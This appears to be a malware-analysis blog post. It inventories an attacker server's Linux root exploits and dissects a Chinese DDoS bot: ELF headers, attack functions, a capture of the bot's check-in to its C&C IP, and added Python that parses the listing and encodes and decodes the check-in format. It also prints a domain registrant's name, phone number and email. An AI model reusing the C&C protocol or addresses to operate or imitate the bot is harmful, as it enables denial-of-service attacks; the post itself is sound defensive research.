7-2:                         13069c09a9e730972aa80facba34f304  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
7x:                          d75e33b06552794cdc4ffacf56ddef68  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
8:                           e6433b5eeae98a0f9c6831cc19261fcd  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
9:                           cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
90:                          216b4256d0c6fa1aa26e3af2b778be23  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
94:                          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
L26_TM:                      510450312fd45771782a50975985f0a4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Linux_2.6(1).12:             94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.12:                94030d4295d745e5c30fe0e552adc824  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.0, not stripped
Linux_2.6.9-joolyshit:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
Output.map:                  f8997fe0b1856e8526491a3efa2622ce  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Output.sh:                   7bb57d03b9f572aafe92a53474ab2d06  POSIX shell script, ISO-8859 text executable, with CRLF, LF line terminators
SSHEXA5.5:                   e2d8f680509a8a8151678aa117a9ed82  directory
SSHEXA5.5.zip:               d18d100f4f1709a04d627b67c2bda4ca  Zip archive data, at least v1.0 to extract
acid:                        1191e4317b1db999dddb874358b100d4  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
cc.py:                       a165075fac9d6658063ee1d96adff2af  Python script, ASCII text executable, with CRLF line terminators
client:                      27b14430b00f8ab6a275cfd078a4779f  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=0x9b9c3a61459d5b931b07439d931c2c31400d50fd, not stripped
client_x86.tar.gz:           3ce1c3ca87b50c7c59416a386704eb87  gzip compressed data, from Unix, last modified: Sat Oct 19 18:54:15 2013
d3vil:                       cf6c56ba83b118b59339fd973facc936  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
exp1:                        0ca06667709ffab67e1805213b33bdc2  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp2:                        453a82ebc34ca50f3ad523ca84bd1dbc  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exp3:                        ff8b8b8328cf1854cbdbe9b24d2892fa  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
exploit:                     0d77d3591cd117c26a3a68431e7fd5b6  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked (uses shared libs), stripped
full-nelson:                 b7d880e7180fc8f369576d51db1c1f98  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
gayros:                      e8af947275be0ff322e1e79aefc25773  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ip.txt:                      ddffbeddcae91136c6b3ab4bed47fb13  ASCII text, with CRLF line terminators
ips.rar:                     cbdc45dc8266c73e20abbbfae0f0caa4  RAR archive data, v1d, os: Win32
keymap22.map:                c948eda49417279d67818d789b0acb78  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.4, not stripped
lenis.sh:                    e05071a638f30e527e54b0452028845f  POSIX shell script, ASCII text executable
local-2.6.9-2005-2006:       9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
local-root-exploit-gayros:   c90359da14a9e5fab6a8b0ca8a5b135e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
passwd.txt:                  270d77b7abb20a785057aaa53af0d2a1  ASCII text, with CRLF line terminators
priv4:                       caa0bad9e98ce0bb51f4d09858a0b913  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.8, not stripped
profild.key:                 9a2a00f4bba2f3e0b1211a1f0cb48896  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
pwnkernel:                   d6f00b090c4ea1052fc1f4abdd47e72e  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
root.py:                     8a03114a2f269f6413767130bde53403  Python script, ASCII text executable
run.sh:                      8484ddd6282dc0b90d4e903866dc1526  Bourne-Again shell script, ASCII text executable
runx:                        3ae636b32c25cfe12dd0a17a26162722  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
tivoli:                      c02abcfd984f50ed3588e8703f667f6a  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), stripped
ubuntu:                      dcdb22eef329ee15bb075ed24dfa9902  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
url:                         8c317f4c9fa83d21e4a6aec63ae61ccf  ASCII text, with CRLF line terminators
vmsplice-local-root-exploit: a83d56cd9f61f6cf20272681d7ff3b91  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
z1d-2011:                    aa5abe2823e405ffce8b55e9145fd251  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
茘鐔域鐔肴㏍誌住鐔区鐔庚zip: d8ece01117f50ada46eeef399fcb7444  Zip archive data, at least v2.0 to extract

---
#MalwareMustDie | IR Handle: MMDD-2014-0026

Full copy here: http://pastebin.com/3psXaj0C
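A lot of the names in that listing point at the same bytes (the same MD5 shows up under a dozen different kernel-version filenames). As an added example (not MMD's or the post's own tooling), here is a Python parser for that `name: md5  file(1) description` format that collapses the listing to unique hashes and summarises it by architecture and linking. The excerpt below is a handful of lines copied from the listing above, not the full 116 entries.

```python
import re
from collections import defaultdict

# One line of the listing: "<name>: <md5>  <file(1) description>"
LINE_RE = re.compile(r"^(?P<name>\S+):\s+(?P<md5>[0-9a-f]{32})\s+(?P<desc>.*)$")

# Excerpt copied from the listing in this post (constructed subset, not all 116 files).
SAMPLE_LISTING = """\
2-6-9-2005:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2-6-9-2006:                  9e654054624b1556c26f6b7b1532b877  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.2.5, not stripped
2.6.9-55:                    898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
2.6.9-55-2007-prv8:          898dde6afb3142e607528359b0935e9e  ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.4.0, not stripped
314_arm32:                   9810036e5bf9c6cb673e78ae61d90cca  ELF 32-bit LSB executable, ARM, version 1 (SYSV), statically linked, for GNU/Linux 2.6.14, not stripped
314_mips:                    cd70bf918ad2c59f0606a8f0ea24ce51  ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70403, not stripped
cc.py:                       a165075fac9d6658063ee1d96adff2af  Python script, ASCII text executable, with CRLF line terminators
profild.key:                 9a2a00f4bba2f3e0b1211a1f0cb48896  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
run.sh:                      8484ddd6282dc0b90d4e903866dc1526  Bourne-Again shell script, ASCII text executable
"""


def parse_listing(text: str):
    """Parse the listing into dicts with name, md5 and desc; skips comment/blank lines."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def duplicate_groups(entries):
    """Map md5 -> filenames for every hash that appears under more than one name."""
    by_hash = defaultdict(list)
    for e in entries:
        by_hash[e["md5"]].append(e["name"])
    return {h: names for h, names in by_hash.items() if len(names) > 1}


def arch_summary(entries):
    """Count entries by CPU architecture as reported by file(1)."""
    counts = defaultdict(int)
    for e in entries:
        d = e["desc"]
        if not d.startswith("ELF"):
            arch = "non-ELF"
        elif "x86-64" in d:
            arch = "x86-64"
        elif "Intel 80386" in d:
            arch = "i386"
        elif "ARM" in d:
            arch = "ARM"
        elif "MIPS" in d:
            arch = "MIPS"
        else:
            arch = "other ELF"
        counts[arch] += 1
    return dict(counts)


def static_elfs(entries):
    """Names of statically linked ELFs: these run on any libc and are the ones to look at first."""
    return [e["name"] for e in entries
            if e["desc"].startswith("ELF") and "statically linked" in e["desc"]]


if __name__ == "__main__":
    ents = parse_listing(SAMPLE_LISTING)
    print(len(ents), "entries,", len({e["md5"] for e in ents}), "unique hashes")
    for h, names in duplicate_groups(ents).items():
        print(h, "->", ", ".join(names))
    print(arch_summary(ents))
    print("static:", static_elfs(ents))
```

Running it over the full listing is how you get from "116 files" to the much shorter list of distinct binaries actually worth sending to a sandbox; the static ones (like `profild.key`, the DDoS client analysed next) are the obvious first pick because they do not depend on the victim's libc.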

And here's MMD's binary analysis of one of the ELF binaries that isn't a kernel exploit. It's a standard DDoS binary that appears to dial home to a C&C:

# MalwareMustDie China ELF DDoSer Analysis
# Comments edited by Yinette
# Sample: 9a2a00f4bba2f3e0b1211a1f0cb48896
# ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
# VT: https://www.virustotal.com/en/file/bb4786695774ae7777200a78e56db83ad5d5bdf1c1b84ef86dd796f7c9a3e1b4/analysis/1409687242/

# Reference1 analysis (x64 base compilation, older version, new dates, CNC: 199.101.117.142)
https://www.virustotal.com/en/file/8fa44a7b3eb707f584b223792bdb78b1e5f69a40dba20634094077c2f0287bca/analysis/1409730903/ 
# Reference2 analysis (same compilation, same CNC IP 61.147.103.21 w/u different port number as CNC)
https://www.virustotal.com/en/file/d2b3ce2195b1422c165faeb1fbbdd098f13df6cf6595fb18f8d618cd78df597c/analysis/1409729124/

# =============================
# Binary Analysis
# =============================

ELF Header:
  Magic:   7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00
  Class:                             ELF32
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              EXEC (Executable file)
  Machine:                           Intel 80386
  Version:                           0x1
  Entry point address:               0x8048120
  Start of program headers:          52 (bytes into file)
  Start of section headers:          1199680 (bytes into file)
  Flags:                             0x0
  Size of this header:               52 (bytes)
  Size of program headers:           32 (bytes)
  Number of program headers:         5
  Size of section headers:           40 (bytes)
  Number of section headers:         28
  Section header string table index: 25

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .init             PROGBITS        080480f4 0000f4 000017 00  AX  0   0  4
  [ 3] .text             PROGBITS        08048120 000120 0e3800 00  AX  0   0 32
  [ 4] __libc_freeres_fn PROGBITS        0812b920 0e3920 000f6e 00  AX  0   0  4
  [ 5] __libc_thread_fre PROGBITS        0812c890 0e4890 0000e2 00  AX  0   0  4
  [ 6] .fini             PROGBITS        0812c974 0e4974 00001a 00  AX  0   0  4
  [ 7] .rodata           PROGBITS        0812c9a0 0e49a0 021eee 00   A  0   0 32
  [ 8] __libc_subfreeres PROGBITS        0814e890 106890 00003c 00   A  0   0  4
  [ 9] __libc_atexit     PROGBITS        0814e8cc 1068cc 000004 00   A  0   0  4
  [10] __libc_thread_sub PROGBITS        0814e8d0 1068d0 000004 00   A  0   0  4
  [11] .eh_frame         PROGBITS        0814e8d4 1068d4 016d08 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        081655dc 11d5dc 005049 00   A  0   0  4
  [13] .tdata            PROGBITS        0816b628 122628 000014 00 WAT  0   0  4
  [14] .tbss             NOBITS          0816b63c 12263c 00001c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        0816b63c 12263c 00002c 00  WA  0   0  4
  [16] .dtors            PROGBITS        0816b668 122668 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        0816b674 122674 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        0816b680 122680 00063c 00  WA  0   0 32
  [19] .got              PROGBITS        0816bcbc 122cbc 00005c 04  WA  0   0  4
  [20] .got.plt          PROGBITS        0816bd18 122d18 00000c 04  WA  0   0  4
  [21] .data             PROGBITS        0816bd40 122d40 001034 00  WA  0   0 32
  [22] .bss              NOBITS          0816cd80 123d74 0091d8 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          08175f58 123d74 000020 00  WA  0   0  4
  [24] .comment          PROGBITS        00000000 123d74 000fa5 00      0   0  1
  [25] .shstrtab         STRTAB          00000000 124d19 000126 00      0   0  1
  [26] .symtab           SYMTAB          00000000 1252a0 018110 10     27 1246  4
  [27] .strtab           STRTAB          00000000 13d3b0 03224e 00      0   0  1

Program Headers:
  Type           Offset   VirtAddr   PhysAddr   FileSiz MemSiz  Flg Align
  LOAD           0x000000 0x08048000 0x08048000 0x122625 0x122625 R E 0x1000
  LOAD           0x122628 0x0816b628 0x0816b628 0x0174c 0x0a950 RW  0x1000
  NOTE           0x0000d4 0x080480d4 0x080480d4 0x00020 0x00020 R   0x4
  TLS            0x122628 0x0816b628 0x0816b628 0x00014 0x00030 R   0x4
  GNU_STACK      0x000000 0x00000000 0x00000000 0x00000 0x00000 RW  0x4

 Section to Segment mapping:
  Segment Sections...
   00     .note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss

Offset 0x000000d4 | len x00000020:
  Owner         Data size       Description
  GNU           0x00000010      NT_VERSION (version)

// Notes:
no dynamic section 
no relocations 
no unwind sections 

# =============================
# Reversing w/debug PoC
# =============================

// first section reversed (for characteristics)
            ;-- section..text:
            0x08048120    31ed         xor ebp, ebp
            0x08048122    5e           pop esi
            0x08048123    89e1         mov ecx, esp
            0x08048125    83e4f0       and esp, 0xfffffff0
            0x08048128    50           push eax
            0x08048129    54           push esp
            0x0804812a    52           push edx
            0x0804812b    68f4c20c08   push sym.__libc_csu_fini ; 0x080cc2f4
            0x08048130    689cc20c08   push sym.__libc_csu_init ; 0x080cc29c
            0x08048135    51           push ecx
            0x08048136    56           push esi
            0x08048137    681ca70408   push sym.main ; 0x0804a71c
            0x0804813c    e8cf390800   call sym.__libc_start_main
               0x080cbb10(unk, unk, unk, unk, unk, unk, unk, unk) ; sym.__libc_start_main
            0x08048141    f4           hlt
            0x08048142    90           nop
            0x08048143    90           nop

// Chinese text appears quite often throughout the binary, which ties in with the Chinese source these were obtained from.
// Not sure where this katakana on the first line came from though... - Yinette

.rodata:081301A0 aINZD  db 'エエスィヤュハシフラスモラヨハァーワ(%d)',0Dh,0Ah,0
0x00747E0  CUNG5
0x007518F  CUNG 
0x0075693  B4CUNG
0x0102520  i18n:1999
  :

// config:
0x00E5C22  fake.cfg
// template:
%d
%d.%d.%d.%d:%d.%d.%d.%d
%d:%d

// poc:
# cat fake.cfg
0
YOUR-IP-HERE:AND-HERE
10000:60000

// Obtain IP of interface with the default route and write it to fake.cfg:

getsockname(3, {sa_family=AF_INET, sin_port=htons(48417), sin_addr=inet_addr("mmd.mmd.mmd.mmd")}, [16]) = 0


// Does a DNS query for www.baidu.com against Google's open resolver at 8.8.8.8 (to test for internet reachability)

0x00E50FD  www.baidu.com
// PoC:
sendto(3, "\231\v\1\0\0\1\0\0\0\0\0\0\3www\5baidu\3com\0\0\1\0\1", 31, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, 16) = 31
recvfrom(3, "\231\v\201\200\0\1\0\2\0\0\0\0\3www\5baidu\3com\0\0\1\0\1\300"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("8.8.8.8")}, [16]) = 74

// compile/compat traces:

0x0124CC0  GCC: (GNU) 4.0.0 20050519 (Red Hat 4.0.0-8)
0x0124CED  GCC: (GNU) 4.0.0 20050525 (Red Hat 4.0.0-9)

// Sources:

 'crtstuff.c'
 'Fake.cpp'
 'Global.cpp'
 'main.cpp'
 'Manager.cpp'
 'ProtocolUtil.cpp'
 'ServerIP.cpp'
 'StatBase.cpp'
 'ThreadAttack.cpp'
 'ThreadAttackKernal.cpp'
 'ThreadHostStatus.cpp'
 'ThreadTaskManager.cpp'
 'ThreadTimer.cpp'
 'AutoLock.cpp'
 'FileOp.cpp'
 'Log.cpp'
 'Md5.cpp'
 'Media.cpp'
 'NetBase.cpp'
 'ThreadCondition.cpp'
 'Thread.cpp'
 'ThreadMutex.cpp'
 'Utility.cpp'

// The ThreadAttack.cpp file in particular provides key functions for some
// nasty looking attacks:

CThreadAttack::ProcessMain(void)
CThreadAttack::EmptyConnectionAtk(CSubTask &)
CThreadAttack::HttpAtk(CSubTask &) 
CThreadAttack::FakeUserAtk(CSubTask &)
CThreadAttack::Stop(void)  
CThreadAttack::DomainInitEx(CRandArray &,char  const*)  
CThreadAttack::DomainRandEx(CRandArray &,int &) 
CThreadAttack::CrossPkt(int) 
CThreadAttack::~CThreadAttack() 
CThreadAttack::CThreadAttack(CManager *)
CThreadAttack::Start(CCmdMessage *)
CThreadAttack::InitCrossPkts(std::vector..
CThreadAttack::PktAtk(CSubTask &,std::vector

http [SYN] Seq=0 Win=14600 Len=0 MSS=1460 SACK_PERM=1 TSval=895351513 TSecr=0 WS=128
180.76.3.151    x.x.x.x TCP 74  http > 48417 [SYN, ACK] Seq=0 Ack=1 Win=14600 Len=0 MSS=1440 SACK_PERM=1
x.x.x.x 180.76.3.151    TCP 54  48417 > http [RST] Seq=1 Win=0 Len=0

// 2. Send data back to CnC:

x.x.x.x 61.147.103.21   TCP 455 33911 > 54460 [PSH, ACK] Seq=1 Ack=1 Win=14720 Len=401

00000000  b8 0b 00 00 00 4e 2e 25  45 4e 2e 25 45 10 27 60 .....N.% EN.%E.**
00000010  ea 4c 69 6e 75 78 20 33  2e 32 2e 30 2d 34 2d 61 .Linux 3 .2.0-4-a
00000020  6d 64 36 34 00 00 00 00  00 00 00 00 00 00 00 00 md64.... ........
00000030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000060  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000090  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000A0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000B0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000C0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000D0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000E0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
000000F0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000100  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000110  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000120  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000130  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000150  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000160  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000170  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000180  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ........ ........
00000190  00                                               .

----
#MalwareMustDie!
/* This analysis post is dedicated to all UNIX sysadmins */

Full copy here: http://pastebin.com/949Y8a3g
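As an added worked example (mine, not MalwareMustDie's or this post's own code), here is a decoder for the 401-byte check-in message in the dump above. The layout is an inference and should be read as an assumption: the first 17 bytes line up with the fake.cfg template shown earlier (a leading integer, a single byte for the first config line, two IPv4 addresses, a port range as two little-endian u16s), followed by the uname string "Linux 3.2.0-4-amd64" and zero padding. The sample message is constructed from documentation-range addresses rather than copied from the capture, but the ports 10000:60000 and the leading word 0x0bb8 are taken from the dump so the encoding can be checked against it.

```python
"""Decode / rebuild the CnC check-in message seen in the capture above.

Added example; the field layout is inferred from the hex dump and the
fake.cfg template ("%d", "%d.%d.%d.%d:%d.%d.%d.%d", "%d:%d") and is an
assumption, not something the binary's source confirms.
"""
import struct
from typing import Dict

MSG_LEN = 401        # Len=401 in the PSH/ACK shown in the post
UNAME_OFFSET = 17    # "Linux 3.2.0-4-amd64" starts at byte 0x11 of the dump

# u32 (0x00000bb8 in the dump, meaning not established), u8 (first fake.cfg line),
# two raw IPv4 addresses, then the port range as two little-endian u16s.
HEADER = struct.Struct("<IB4s4sHH")


def decode_checkin(msg: bytes) -> Dict[str, object]:
    """Split a check-in message into its inferred fields."""
    if len(msg) != MSG_LEN:
        raise ValueError(f"expected {MSG_LEN} bytes, got {len(msg)}")
    magic, flag, ip_a, ip_b, port_lo, port_hi = HEADER.unpack_from(msg, 0)
    # uname is NUL-terminated and the remainder of the message is zero padding
    uname = msg[UNAME_OFFSET:].split(b"\x00", 1)[0].decode("ascii", "replace")
    return {
        "magic": magic,
        "flag": flag,
        "ip_a": ".".join(str(b) for b in ip_a),
        "ip_b": ".".join(str(b) for b in ip_b),
        "port_range": (port_lo, port_hi),
        "uname": uname,
    }


def encode_checkin(flag: int, ip_a: str, ip_b: str, port_lo: int, port_hi: int,
                   uname: str, magic: int = 0x0BB8) -> bytes:
    """Build a message of the same shape, e.g. to feed an IDS rule under test."""
    hdr = HEADER.pack(magic, flag,
                      bytes(int(o) for o in ip_a.split(".")),
                      bytes(int(o) for o in ip_b.split(".")),
                      port_lo, port_hi)
    return (hdr + uname.encode("ascii")).ljust(MSG_LEN, b"\x00")


def from_fake_cfg(cfg_text: str, uname: str) -> bytes:
    """Parse the three-line fake.cfg format from the post and encode it."""
    lines = [ln.strip() for ln in cfg_text.strip().splitlines()]
    flag = int(lines[0])
    ip_a, ip_b = lines[1].split(":")
    port_lo, port_hi = (int(p) for p in lines[2].split(":"))
    return encode_checkin(flag, ip_a, ip_b, port_lo, port_hi, uname)


# Constructed sample config in the fake.cfg layout shown in the post
# (documentation-range address stands in for "YOUR-IP-HERE:AND-HERE").
SAMPLE_CFG = "0\n203.0.113.7:203.0.113.7\n10000:60000\n"
SAMPLE_MSG = from_fake_cfg(SAMPLE_CFG, "Linux 3.2.0-4-amd64")

if __name__ == "__main__":
    for k, v in decode_checkin(SAMPLE_MSG).items():
        print(f"{k:>10}: {v}")
```

With the ports from the PoC config, bytes 13 to 16 of the encoded message come out as 10 27 60 ea and the first word as b8 0b 00 00, which is what the dump shows at those offsets; that is the check that makes the inferred layout worth anything.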

Domain and IP analysis

Interestingly (or not), the attack in this instance came from the same IP that we saw hosting the files and the same IP that is the CNC. The system itself appears to be a machine hosted out of Jiangsu Province, China.

Here’s what we could see on the web-based file explorer:

(photo supplied by MalwareMustDie)

After I had retrieved MOST of the files, it appears they noticed and then deleted everything (hey guys! lol)

There is a domain pointing to our CNC / hosting / attack IP (as evident in our massive shell script): pingyan-china.com

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name:pingyan-china.com
Registry Domain ID:
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2013-09-30 00:38:42
Creation Date:2013-09-30 00:33:31
Registrar Registration Expiration Date:2014-09-30 00:33:31
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:supervision@xinnet.com
Registrar Abuse Contact Phone:+86.1087128064
Domain Status:ok
Registry Registrant ID:
Registrant Name:Wang ShanShi
Registrant Organization:fdgf fggh
Registrant Street:gghjkj  ddfgh dddf
Registrant City:chengdu
Registrant State/Province:Sichuan
Registrant Postal Code:310400
Registrant Country:China
Registrant Phone:+86.028 89908908
Registrant Phone Ext:
Registrant Fax:+86.028 78789090
Registrant Fax Ext:
Registrant Email:280954460@qq.com
Registry Admin ID:
Admin Name:fdgf fggh
Admin Organization:fdgf fggh
Admin Street:gghjkj  ddfgh dddf
Admin City:chengdu
Admin State/Province:Sichuan
Admin PostalCode:310400
Admin Country:China
Admin Phone:+86.028 89908908
Admin Phone Ext:
Admin Fax:+86.028 78789090
Admin Fax Ext:
Admin Email:280954460@qq.com
Registry Tech ID:
Tech Name:fdgf fggh
Tech Organization:fdgf fggh
Tech Street:gghjkj  ddfgh dddf
Tech City:chengdu
Tech State/Province:Sichuan
Tech PostalCode:310400
Tech Country:China
Tech Phone:+86.028 89908908
Tech Phone Ext:
Tech Fax:+86.028 78789090
Tech Fax Ext:
Tech Email:280954460@qq.com
Name Server:dxdns.ybnic.com
Name Server:dxdns2.ybnic.com
Name Server:ltdns.ybnic.com
Name Server:gwdns.ybnic.com
DNSSEC:unsigned

As you can see in the whois, this is likely to not be a legitimate registration, unless Wang Shanshi works at a company called ‘fdgf fggh’ at the address of ‘gghjkj ddfgh dddf, Sichuan, CN.’

(Or Mr Shanshi is a lazy bastard at typing.)

Google couldn’t help me with that one…

The IP 61.147.103.21 itself is familiar to me:

inetnum:        61.147.0.0 - 61.147.255.255
netname:        CHINANET-JS
descr:          CHINANET jiangsu province network
descr:          China Telecom
descr:          A12,Xin-Jie-Kou-Wai Street
descr:          Beijing 100088
country:        CN
admin-c:        CH93-AP
tech-c:         CJ186-AP
mnt-by:         MAINT-CHINANET
mnt-lower:      MAINT-CHINANET-JS
mnt-routes:     maint-chinanet-js
changed:        hostmaster@ns.chinanet.cn.net 20020209
changed:        hostmaster@ns.chinanet.cn.net 20030306
status:         ALLOCATED non-PORTABLE
source:         APNIC

role:           CHINANET JIANGSU
address:        260 Zhongyang Road,Nanjing 210037
country:        CN
phone:          +86-25-86588231
phone:          +86-25-86588745
fax-no:         +86-25-86588104
e-mail:         ip@jsinfo.net
remarks:        send anti-spam reports to spam@jsinfo.net
remarks:        send abuse reports to abuse@jsinfo.net
remarks:        times in GMT+8
admin-c:        CH360-AP
tech-c:         CS306-AP
tech-c:         CN142-AP
nic-hdl:        CJ186-AP
remarks:        www.jsinfo.net
notify:         ip@jsinfo.net
mnt-by:         MAINT-CHINANET-JS
changed:        dns@jsinfo.net 20090831
changed:        ip@jsinfo.net 20090831
changed:        hm-changed@apnic.net 20090901
source:         APNIC
changed:        hm-changed@apnic.net 20111114

person:         Chinanet Hostmaster
nic-hdl:        CH93-AP
e-mail:         anti-spam@ns.chinanet.cn.net
address:        No.31 ,jingrong street,beijing
address:        100032
phone:          +86-10-58501724
fax-no:         +86-10-58501724
country:        CN
changed:        dingsy@cndata.com 20070416
changed:        zhengzm@gsta.com 20140227
mnt-by:         MAINT-CHINANET
source:         APNIC

This doesn’t surprise me, ranges in the 61.147.0.0/16 are known for malicious traffic. In particular I’ve spotted the entire 61.147.51.0/24 range SSH Brute-Forcing a lot of IPs at once. Someone has some serious resources going into this shit.

Quick Update!

Seems after deleting everything off their webserver, they decided to upload something new.

Check out the following VirusTotal Result and MMD’s comments with some quick RE notes :)

https://www.virustotal.com/en/file/6dd946e821df59705dcfeb79fab810336d0ee497fd715fb5b6711e05c0428f4d/analysis/

It seems for this DDoS binary to run properly, it needs root access on the host system. This is why it is trying to root the system it has targeted.

More to come!

Thanks to:

MalwareMustDie for ELF Analysis and Research.

These random Chinese guys for leaving their toys for me to find :)

My work for allowing me to do cool shit like this for a hobby.

i59 – a story of spammers, pornography, and really old joomla exploits

